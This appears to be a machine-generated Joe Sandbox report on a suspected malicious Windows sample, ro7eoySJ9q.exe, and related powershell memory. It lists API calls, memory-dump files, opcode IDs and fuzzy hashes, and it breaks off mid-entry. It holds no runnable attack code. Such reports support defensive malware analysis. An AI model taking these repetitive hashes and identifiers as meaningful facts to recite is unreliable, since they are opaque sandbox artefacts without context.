                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                      • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                                      • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                      • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404F9D
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                                        • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                      • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                                      • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                      • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,0040365D,0040349F,?), ref: 0040369F
                                                                      • GlobalFree.KERNEL32(?), ref: 004036A6
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-3936084776
                                                                      • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                      • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                                      • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                      • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3125694417
                                                                      • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                      • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                                      • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                      • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                                      • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                                      • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                      • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                                      • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                      • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2815773747.000000000498D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0498D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_498d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff10296548f4052cd1343da1a8a3f95fc164b6e639127d8b8c0ddbca908630b6
                                                                      • Instruction ID: 101958d4c1db08968c97029c71d674cb5f918e98b3858f87b1e86d0289936fa2
                                                                      • Opcode Fuzzy Hash: ff10296548f4052cd1343da1a8a3f95fc164b6e639127d8b8c0ddbca908630b6
                                                                      • Instruction Fuzzy Hash: BB21C476604240EFDF05EF18D9C0B26BF66FB88314F24C5ADE9094A25AC736E456CB61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l/9
                                                                      • API String ID: 0-2717826406
                                                                      • Opcode ID: 003b02d02356a35b09dbed9c112fbef4ece7056394d6faf0dbfe03bf6e0947dc
                                                                      • Instruction ID: 60a359e31540f2a4faa93945e1fafd044508d3908b2cc7682063b62869341ea1
                                                                      • Opcode Fuzzy Hash: 003b02d02356a35b09dbed9c112fbef4ece7056394d6faf0dbfe03bf6e0947dc
                                                                      • Instruction Fuzzy Hash: 47428274B00215DFD714DB58C850BAABBB6BF89714F10C0A9D908AF751CB72ED858F92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ca638d42415680c49792726ceaf4f4716368b644dac31c20e5138d501607be3
                                                                      • Instruction ID: 253d93b3612a1491566ff4b0547998c8badeaf8549356ee51e4c3b0d6bb41e02
                                                                      • Opcode Fuzzy Hash: 3ca638d42415680c49792726ceaf4f4716368b644dac31c20e5138d501607be3
                                                                      • Instruction Fuzzy Hash: E1925FB4B00219DFDB14DB58C854FAABBB2AF89744F1080A9D509AF751CB72DD81CF92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54d70e57a9b2d730b35a795f7b5c2fecace37cc6f62ecdad69c23b241e10c59d
                                                                      • Instruction ID: 1ea222136ae2890cf330a43627e8702e7f27441add40223d4ed7234bbf968297
                                                                      • Opcode Fuzzy Hash: 54d70e57a9b2d730b35a795f7b5c2fecace37cc6f62ecdad69c23b241e10c59d
                                                                      • Instruction Fuzzy Hash: 7932EEB4B00209DBDB149FA8C450BAEBBA6AFD8714F14806AD541EF782DF71DC45CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eac5875f45b50c380cfdf5b3da7293b5833a453c3375c6f19e7b171f689e73dc
                                                                      • Instruction ID: 3d9270d6483b88ac45fa5cd0bf0f1a75f8e2e12c705679ff93bcf6ea35cb8688
                                                                      • Opcode Fuzzy Hash: eac5875f45b50c380cfdf5b3da7293b5833a453c3375c6f19e7b171f689e73dc
                                                                      • Instruction Fuzzy Hash: 635260B4B00215DFD714DF18C844BA9B7B6BB89714F15C0A9DA09AF351CB72ED818F52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 46d3f4962c02484c6403e519a3d45186d4ff06100682a34e50ab681f8e7d2f7d
                                                                      • Instruction ID: 4255369a576c7dbe44cf0ce6b0ba64b8b444967baed8ac634ca72b921b7c1f94
                                                                      • Opcode Fuzzy Hash: 46d3f4962c02484c6403e519a3d45186d4ff06100682a34e50ab681f8e7d2f7d
                                                                      • Instruction Fuzzy Hash: FA4250B4B402149FD714DB18C850FAABBB2AFC9744F1180A9D9099F791CB72ED81CF92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d2ce21452abe1741050d58dc7d182274eea468162c62d46934cdaf6d006d7027
                                                                      • Instruction ID: f29985784f2e85c16431e314878ae35e5aa20a4f0677ef6ec3864442f011fd48
                                                                      • Opcode Fuzzy Hash: d2ce21452abe1741050d58dc7d182274eea468162c62d46934cdaf6d006d7027
                                                                      • Instruction Fuzzy Hash: C62229B4B00205DFDB04CF98D454FAEBBB6AF89714F258069E9059B791CB72EC428F52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40a332c358406b19ecf47ab8434c30441a377888753fc6b4ee1a8074b649f058
                                                                      • Instruction ID: cd5be1febf8a346017487eb610e21b4a7850eff651441122d2645c318f239cce
                                                                      • Opcode Fuzzy Hash: 40a332c358406b19ecf47ab8434c30441a377888753fc6b4ee1a8074b649f058
                                                                      • Instruction Fuzzy Hash: D21240B47002149FD714DB58C854FAABBB2EBC9744F1180A9E9099F791CB72ED81CF92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 918f6e892df16dd419467a75a5fda243d3ed36bb99501e23b623cec031ddc798
                                                                      • Instruction ID: 1275239e9b33a5d88ab85d8e968d27910acb77417f9b1d51e53010cf62008688
                                                                      • Opcode Fuzzy Hash: 918f6e892df16dd419467a75a5fda243d3ed36bb99501e23b623cec031ddc798
                                                                      • Instruction Fuzzy Hash: 87124AB4B40219DFDB24DF18C844BAABBB6BB99704F11C0A5E509AB351CB72DD81CF52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94ff7150951163363b6f0c7d9b26be48404be8373c525ed9bef9a7a0ef2536b4
                                                                      • Instruction ID: 3a12531228a3d571c55b2f2da77db02f5d461fa917cee7b2af99a6f375a045c5
                                                                      • Opcode Fuzzy Hash: 94ff7150951163363b6f0c7d9b26be48404be8373c525ed9bef9a7a0ef2536b4
                                                                      • Instruction Fuzzy Hash: DC021A75A01209DFDB05DF9CD884AAEBBB2FF88310F248159E915AB366C771ED41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d27637cd85f25e35d05b654775910dfd53f3a19fec827a9c65bef0e6e97b9dd
                                                                      • Instruction ID: 41171013fcff40d335fc38dd92949a76b3c250f9d8e2d9d4b7707b92ced6df25
                                                                      • Opcode Fuzzy Hash: 7d27637cd85f25e35d05b654775910dfd53f3a19fec827a9c65bef0e6e97b9dd
                                                                      • Instruction Fuzzy Hash: 45022E75A01209DFDB05CF9CD894A9EBBB2FF88310F248159E915AB362C775ED81CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bae91c02b21198be6774d65a9f3ce0597495c59de6263a35764467f8efd3474b
                                                                      • Instruction ID: e7ebcc5307ed8e83e36f762a8e53f8a859c14b8c44bf229f4b2c8cfc3a921203
                                                                      • Opcode Fuzzy Hash: bae91c02b21198be6774d65a9f3ce0597495c59de6263a35764467f8efd3474b
                                                                      • Instruction Fuzzy Hash: D0F138B4B01205EFDB04CF98C584FA9BBB6EF98714F158069E9059B391CB72ED428F52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31b223c536a15d1c23045e95b75fe27274206d991db8e6314757676da847ad52
                                                                      • Instruction ID: 74c59130357d22f96d39ea14d0f8890caedebd6b94aa370e87a968a62e3892c9
                                                                      • Opcode Fuzzy Hash: 31b223c536a15d1c23045e95b75fe27274206d991db8e6314757676da847ad52
                                                                      • Instruction Fuzzy Hash: 88021875A05209DFDB05CF9CD884AADBBB2FF88310F648159E915AB361CB31ED81CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ff0da38b9aadb3e05ea81290fa3e69dbc4be6eee6e63ef282490d342d98a0c1
                                                                      • Instruction ID: 072a6a7e1a97a035c03731ea454d79237e597041bc0b5845a4cbac576603e53e
                                                                      • Opcode Fuzzy Hash: 6ff0da38b9aadb3e05ea81290fa3e69dbc4be6eee6e63ef282490d342d98a0c1
                                                                      • Instruction Fuzzy Hash: 50E17BB4B00245DFD714CF98C454BAABBB6AF99704F14C069E909DB751CB72EC42CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1dc2eb8b7c130f74a5bf5054a1b5dfe8b85ab36f723811d746f5d5d0cd985010
                                                                      • Instruction ID: 073e41df409bdf836c9bb0d971a04a11f73541d7e3a1c7d51dd460d6bd834fbd
                                                                      • Opcode Fuzzy Hash: 1dc2eb8b7c130f74a5bf5054a1b5dfe8b85ab36f723811d746f5d5d0cd985010
                                                                      • Instruction Fuzzy Hash: 22E11975A01249DFDB15DFACC894A9DBBB2FF89310F248159E844AB351CB71ED82CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28d05d84ece9e75da64153df2431694157c66328c339cf346df455ca78cd3718
                                                                      • Instruction ID: 644d86b2cefad9c0f02a4d3447247d517edc9ab8c757f6f10140711c0118e4f9
                                                                      • Opcode Fuzzy Hash: 28d05d84ece9e75da64153df2431694157c66328c339cf346df455ca78cd3718
                                                                      • Instruction Fuzzy Hash: B6E157B4B002459FDB14CF98C444FAABBB6AF99714F158069E909EB351CB72EC42CF51
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7810000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dfad9687e17ebd7808a71254e47d131339bec3b7b6c25d9a893f2e866ff2a547
                                                                      • Instruction ID: 944ec39cb24faa3f528967e761d77266d08f5773a2ad5256e06486efadaf95fc
                                                                      • Opcode Fuzzy Hash: dfad9687e17ebd7808a71254e47d131339bec3b7b6c25d9a893f2e866ff2a547
                                                                      • Instruction Fuzzy Hash: DFE15BB4B40219DFDB24DB14C844FAABBB6BB99704F1081D4D509AB351CB72DD81CF52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e9eeb4955ae070603005c0f1238da5540b50cc1e960027e961899cfa13cbb66
                                                                      • Instruction ID: 0c1470c598b69cf71547838e7306b5a11f91836257ea98b044bf6a6585fda826
                                                                      • Opcode Fuzzy Hash: 6e9eeb4955ae070603005c0f1238da5540b50cc1e960027e961899cfa13cbb66
                                                                      • Instruction Fuzzy Hash: 27D11934A01249EFDB05CFA8D584A9DFBF2AF88314F25C1A9E844AB361D775ED41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4209aa5b23773696b332f1cc0c9086dafae968cf358f983332dad1821cb7333c
                                                                      • Instruction ID: 00694e3c63e482eefff76e08d67e6e010d9d45be932dadc86aa8aa86253bef23
                                                                      • Opcode Fuzzy Hash: 4209aa5b23773696b332f1cc0c9086dafae968cf358f983332dad1821cb7333c
                                                                      • Instruction Fuzzy Hash: FDC18F31A00248DFDB14DFA4D944AADBBB2FF84324F118569E406AB364DB74FD49CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 34c050b49e76038c5b8b3c55bdcdc1be864462e1bb9b7434fa7c74d320984723
                                                                      • Instruction ID: c8289e1c97f7c9df1ed9c0d6565d1ae6981855e8b623d5846391c9ccb467bee6
                                                                      • Opcode Fuzzy Hash: 34c050b49e76038c5b8b3c55bdcdc1be864462e1bb9b7434fa7c74d320984723
                                                                      • Instruction Fuzzy Hash: C1818C71B002098FDB15DFA9D854AAEBBF6FFC8300F148169D805AB355DB75AC46CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
